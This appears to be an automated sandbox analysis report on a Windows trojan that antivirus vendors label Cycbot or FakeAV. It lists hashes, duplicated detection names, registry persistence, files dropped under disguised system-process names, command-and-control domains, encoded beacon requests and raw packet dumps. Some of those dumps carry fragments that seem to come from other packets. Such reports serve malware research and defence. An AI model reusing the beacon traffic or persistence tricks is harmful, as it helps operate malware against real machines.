Analysis Date2014-07-02 22:56:32
MD5fd904f785d8a3caed56b47c197254c40
SHA1e9e1b90d26ce1573d17a9ec7ecb8f6489f4e0c72

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 93517ab5c7fe079ccee1371b1c2e7338 sha1: d1eec0820cf2128ad4ec372130208552de6f7f02 size: 173568
Section.rdata md5: 608252ae6ddf347183e994a19f0df615 sha1: 059fa071f139485eeb3a5929f4b9a56a3716281d size: 2560
Section.data md5: 71a5c317089d34884f3087411375d9e8 sha1: e3473b315c04d6942cd7a4edf7bb902b2dec8520 size: 20480
Section.crt md5: f81940dcd59f615e26526363e57b4899 sha1: e688c1d510ec0bc42ad94d3eba6b34089508b251 size: 512
Timestamp2005-09-30 17:14:59
VersionPrivateBuild: 1520
PEhash797c17d85c09fd5e6c2a354a44ee0e3e6f947d1a
IMPhash6756e0c90847d34db4c907e34233acfb
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Agent.psa.35
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-100634
AVDr. WebTrojan.DownLoader1.60509
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KFV
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.CCK
AVIkarusGen.Variant.Kazy
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingTrojan.Win32.Generic.127C5600
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVMalwareBytesSpyware.Passwords.XGen
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVCAT (quickheal)Backdoor.Cycbot.B
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVFortinetW32/FakeAV.PACK!tr
AVIkarusGen.Variant.Kazy
AVArcabit (arcavir)no_virus
AV360 SafeGen:Trojan.Heur.KS.1
AVK7Backdoor ( 003210941 )
AVAlwil (avast)Cybota [Trj]
AVSymantecTrojan.Gen.2
AVEset (nod32)Win32/Kryptik.KFV
AVGrisoft (avg)Cryptic.CCK
AVEmsisoftGen:Trojan.Heur.KS.1
AVAvira (antivir)TR/Agent.psa.35
AVRisingTrojan.Win32.Generic.127C5600
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVDr. WebTrojan.DownLoader1.60509
AVMcafeeBackDoor-EXI.gen.h
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAd-AwareGen:Trojan.Heur.KS.1
AVClamAVWin.Trojan.Agent-100634
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVTrend MicroBKDR_CYCBOT.SMIB
AVKasperskyTrojan.Win32.Generic
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSzonetk.com
Winsock DNSzonere.com
Winsock DNSremotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSremotesupportsystem.com
Type: A
69.13.210.253
DNSzonetf.com
Type: A
208.73.210.205
DNSzonetf.com
Type: A
208.73.210.203
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.173
DNSzonere.com
Type: A
8.5.1.39
DNSzonetk.com
Type: A
HTTP GEThttp://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKydXicJg0ehEHp1p41wb0Q3AW1oOPgf7Lh%2F1RvvUrAiNIWcoecy0TxR5eEBuqhrs7KZjTK%2BMXG2euVOFqSHQqvXp%2BLxLNHGv0WMHwU%2Bv%2BZkhANUoj%2B5X%2FvT6%2F0%2FNB75sAtfLw23npg08In15SJPxbcMTnk0cOlLLl2aWaXybgEvZMK6g%2FaRGGcLc%2BFWg8sE0saGP3g3zrtcfWfpFyaI%2BIXX9O%2FvCS5sQcAqgP4MXRCD2sONRzw7Co34ed6HoazMF%2FQOwqI7vbssGW%2BrqJFz4vh2n0dk8aDr8b06nQ3LjRSg3eXN5%2BB2Kl%2FaAbQQkbQRe6S3tJuEb7dmxLD6nYLOeS5rSa8TKlDHRiSMqcVvAh0Hckn6agMCe%2B3xD5JzUAEU%2FbdCGSTT4LAKgyuW8drbxxg18%2Fe6sz6AOvbgpzR5sAo3l99V0ZRg%2Byc%2Bm2kw5HNUokzu8H2nFJVWTM%2F%2FpalZvKUVnkCbiFnX0EO0lVrnpuvwTpacFqQPrBwApRhFRytRaVT7NnXBC3dMLa21vP6JafXJSHo1tZKKCgrKdDj73rIylo8RPRKPkry3MNA0eBkLUs9p7y3fvUXrHbU5N6ppxvoT%2BqRJMxjb4DyhR
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonere.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvEo1OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP192.168.1.1:1032 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1033 ➝ 8.5.1.39:80
Flows TCP192.168.1.1:1034 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1035 ➝ 208.73.210.205:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 72737375   GET /images/rssu
0x00000010 (00016)   6e695f73 6d616c6c 2e676966 3f74713d   ni_small.gif?tq=
0x00000020 (00032)   67503461 4b796458 69634a67 30656845   gP4aKydXicJg0ehE
0x00000030 (00048)   48703170 34317762 30513341 57316f4f   Hp1p41wb0Q3AW1oO
0x00000040 (00064)   50676637 4c682532 46315276 76557241   Pgf7Lh%2F1RvvUrA
0x00000050 (00080)   694e4957 636f6563 79305478 52356545   iNIWcoecy0TxR5eE
0x00000060 (00096)   42757168 7273374b 5a6a544b 2532424d   Buqhrs7KZjTK%2BM
0x00000070 (00112)   58473265 75564f46 71534851 71765870   XG2euVOFqSHQqvXp
0x00000080 (00128)   2532424c 784c4e48 47763057 4d487755   %2BLxLNHGv0WMHwU
0x00000090 (00144)   25324276 2532425a 6b68414e 556f6a25   %2Bv%2BZkhANUoj%
0x000000a0 (00160)   32423558 25324676 54362532 46302532   2B5X%2FvT6%2F0%2
0x000000b0 (00176)   464e4237 35734174 664c7732 336e7067   FNB75sAtfLw23npg
0x000000c0 (00192)   3038496e 3135534a 50786263 4d546e6b   08In15SJPxbcMTnk
0x000000d0 (00208)   30634f6c 4c4c6c32 61576158 79626745   0cOlLLl2aWaXybgE
0x000000e0 (00224)   765a4d4b 36672532 46615247 47634c63   vZMK6g%2FaRGGcLc
0x000000f0 (00240)   25324246 57673873 45307361 47503367   %2BFWg8sE0saGP3g
0x00000100 (00256)   337a7274 63665766 70467961 49253242   3zrtcfWfpFyaI%2B
0x00000110 (00272)   49585839 4f253246 76435335 73516341   IXX9O%2FvCS5sQcA
0x00000120 (00288)   71675034 4d585243 4432734f 4e527a77   qgP4MXRCD2sONRzw
0x00000130 (00304)   37436f33 34656436 486f617a 4d462532   7Co34ed6HoazMF%2
0x00000140 (00320)   46514f77 71493776 62737347 57253242   FQOwqI7vbssGW%2B
0x00000150 (00336)   72714a46 7a347668 326e3064 6b386144   rqJFz4vh2n0dk8aD
0x00000160 (00352)   72386230 366e5133 4c6a5253 67336558   r8b06nQ3LjRSg3eX
0x00000170 (00368)   4e352532 4242324b 6c253246 61416251   N5%2BB2Kl%2FaAbQ
0x00000180 (00384)   516b6251 52653653 33744a75 45623764   QkbQRe6S3tJuEb7d
0x00000190 (00400)   6d784c44 366e594c 4f655335 72536138   mxLD6nYLOeS5rSa8
0x000001a0 (00416)   544b6c44 48526953 4d716356 76416830   TKlDHRiSMqcVvAh0
0x000001b0 (00432)   48636b6e 3661674d 43652532 42337844   Hckn6agMCe%2B3xD
0x000001c0 (00448)   354a7a55 41455525 32466264 43475354   5JzUAEU%2FbdCGST
0x000001d0 (00464)   54344c41 4b677975 57386472 62787867   T4LAKgyuW8drbxxg
0x000001e0 (00480)   31382532 46653673 7a36414f 76626770   18%2Fe6sz6AOvbgp
0x000001f0 (00496)   7a523573 416f336c 39395630 5a526725   zR5sAo3l99V0ZRg%
0x00000200 (00512)   32427963 2532426d 326b7735 484e556f   2Byc%2Bm2kw5HNUo
0x00000210 (00528)   6b7a7538 48326e46 4a565754 4d253246   kzu8H2nFJVWTM%2F
0x00000220 (00544)   25324670 616c5a76 4b55566e 6b436269   %2FpalZvKUVnkCbi
0x00000230 (00560)   466e5830 454f306c 56726e70 75767754   FnX0EO0lVrnpuvwT
0x00000240 (00576)   70616346 71515072 42774170 52684652   pacFqQPrBwApRhFR
0x00000250 (00592)   79745261 5654374e 6e584243 33644d4c   ytRaVT7NnXBC3dML
0x00000260 (00608)   61323176 50364a61 66584a53 486f3174   a21vP6JafXJSHo1t
0x00000270 (00624)   5a4b4b43 67724b64 446a3733 7249796c   ZKKCgrKdDj73rIyl
0x00000280 (00640)   6f385250 524b506b 7279334d 4e413065   o8RPRKPkry3MNA0e
0x00000290 (00656)   426b4c55 73397037 79336676 55587248   BkLUs9p7y3fvUXrH
0x000002a0 (00672)   6255354e 36707078 766f5425 32427152   bU5N6ppxvoT%2BqR
0x000002b0 (00688)   4a4d786a 62344479 68522048 5454502f   JMxjb4DyhR HTTP/
0x000002c0 (00704)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000002d0 (00720)   20636c6f 73650d0a 486f7374 3a207265    close..Host: re
0x000002e0 (00736)   6d6f7465 73757070 6f727473 79737465   motesupportsyste
0x000002f0 (00752)   6d2e636f 6d0d0a41 63636570 743a202a   m.com..Accept: *
0x00000300 (00768)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000310 (00784)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a373620   on: close....76 
0x00000150 (00336)   37363535 37323431 20202050 6766374c   76557241   Pgf7L
0x00000160 (00352)   68253246 31527676 5572410a            h%2F1RvvUrA.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427645 6f314f6a 62777667 53393137   fBvEo1OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6572652e 636f6d0d   ost: zonere.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a44 304f704c 6a527141   .11....D0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a373620   on: close....76 
0x00000150 (00336)   37363535 37323431 20202050 6766374c   76557241   Pgf7L
0x00000160 (00352)   68253246 31527676 5572410a            h%2F1RvvUrA.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a35 37323431 20202050 6766374c   ...57241   Pgf7L
0x00000160 (00352)   68253246 31527676 5572410a            h%2F1RvvUrA.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a4c 4f655335 72536138   /html>.LOeS5rSa8
0x000001a0 (00416)   544b6c44 48526953 4d716356 76416830   TKlDHRiSMqcVvAh0
0x000001b0 (00432)   48636b6e 3661674d 43652532 42337844   Hckn6agMCe%2B3xD
0x000001c0 (00448)   354a7a55 41455525 32466264 43475354   5JzUAEU%2FbdCGST
0x000001d0 (00464)   54344c41 4b677975 57386472 62787867   T4LAKgyuW8drbxxg
0x000001e0 (00480)   31382532 46653673 7a36414f 76626770   18%2Fe6sz6AOvbgp
0x000001f0 (00496)   7a523573 416f336c 39395630 5a526725   zR5sAo3l99V0ZRg%
0x00000200 (00512)   32427963 2532426d 326b7735 484e556f   2Byc%2Bm2kw5HNUo
0x00000210 (00528)   6b7a7538 48326e46 4a565754 4d253246   kzu8H2nFJVWTM%2F
0x00000220 (00544)   25324670 616c5a76 4b55566e 6b436269   %2FpalZvKUVnkCbi
0x00000230 (00560)   466e5830 454f306c 56726e70 75767754   FnX0EO0lVrnpuvwT
0x00000240 (00576)   70616346 71515072 42774170 52684652   pacFqQPrBwApRhFR
0x00000250 (00592)   79745261 5654374e 6e584243 33644d4c   ytRaVT7NnXBC3dML
0x00000260 (00608)   61323176 50364a61 66584a53 486f3174   a21vP6JafXJSHo1t
0x00000270 (00624)   5a4b4b43 67724b64 446a3733 7249796c   ZKKCgrKdDj73rIyl
0x00000280 (00640)   6f385250 524b506b 7279334d 4e413065   o8RPRKPkry3MNA0e
0x00000290 (00656)   426b4c55 73397037 79336676 55587248   BkLUs9p7y3fvUXrH
0x000002a0 (00672)   6255354e 36707078 766f5425 32427152   bU5N6ppxvoT%2BqR
0x000002b0 (00688)   4a4d786a 62344479 68522048 5454502f   JMxjb4DyhR HTTP/
0x000002c0 (00704)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000002d0 (00720)   20636c6f 73650d0a 486f7374 3a207265    close..Host: re
0x000002e0 (00736)   6d6f7465 73757070 6f727473 79737465   motesupportsyste
0x000002f0 (00752)   6d2e636f 6d0d0a41 63636570 743a202a   m.com..Accept: *
0x00000300 (00768)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000310 (00784)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....


Strings